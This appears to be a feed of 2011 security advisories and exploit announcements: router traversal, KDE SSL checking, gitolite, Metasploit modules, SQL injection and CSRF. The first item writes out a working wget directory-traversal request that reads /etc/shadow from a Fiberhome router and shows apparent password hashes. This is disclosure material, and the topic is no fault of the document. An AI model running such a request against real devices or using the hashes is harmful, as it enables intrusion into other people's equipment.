Re: Fiberhome HG-110 (adsl/router) vulnerabilities

0
Posted by Zerial. on Apr 10You can include /etc/shadow: $ wget -o /dev/null -O - "http://192.168.1.1:8000/cgi-bin /webproc?getpage=../../../../../../../../../../../../etc/shadow& var:menu=advanced&var:page=dns" #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7::: #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::... Source: Re: Fiberhome HG-110 (adsl/router) vulnerabilities

Mandriva Linux Security Advisory 2011-071

0
Mandriva Linux Security Advisory 2011-071 - kio/kio/tcpslavebase.cpp in KDE KSSL in kdelibs before 4.6.1 does not properly verify that the server hostname matches the...

1024cms ACP 1.1.0 Complete Modules Directory Traversal

0
1024cms Admin Control Panel version 1.1.0 Beta Complete-Modules package suffers from a directory traversal vulnerability. Source: 1024cms ACP 1.1.0 Complete Modules Directory Traversal

Gmail login status detect

0
Posted by IEhrepus on Apr 09http://www.80vul.com/test/gflashtoxml.htm hitest Source: Gmail login status detect

ManageEngine Applications Manager Authenticated Code Execution

0
This Metasploit module logs into the Manage Engine Applications Manager to upload a payload to the file system and a batch script that executes...

[SECURITY] [DSA 2215-1] gitolite security update

0
Posted by Nico Golde on Apr 09------------------------------------------------------------------------- Debian Security Advisory DSA-2215-1 ...

Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution

0
This Metasploit module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The "exec" function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to...

Mandriva Linux Security Advisory 2011-072

0
Mandriva Linux Security Advisory 2011-072 - It was discovered that gwenhywfar was using an old private copy of the ca-bundle.crt file containing the root...

Watchdek Force Delete Cross Site Request Forgery

0
Watchdek Social Networking suffers from a cross site request forgery vulnerability. Source: Watchdek Force Delete Cross Site Request Forgery

Turkish Videoopro 2 SQL Injection

0
Turkish Videoopro version 2 suffers from a remote SQL injection vulnerability. Source: Turkish Videoopro 2 SQL Injection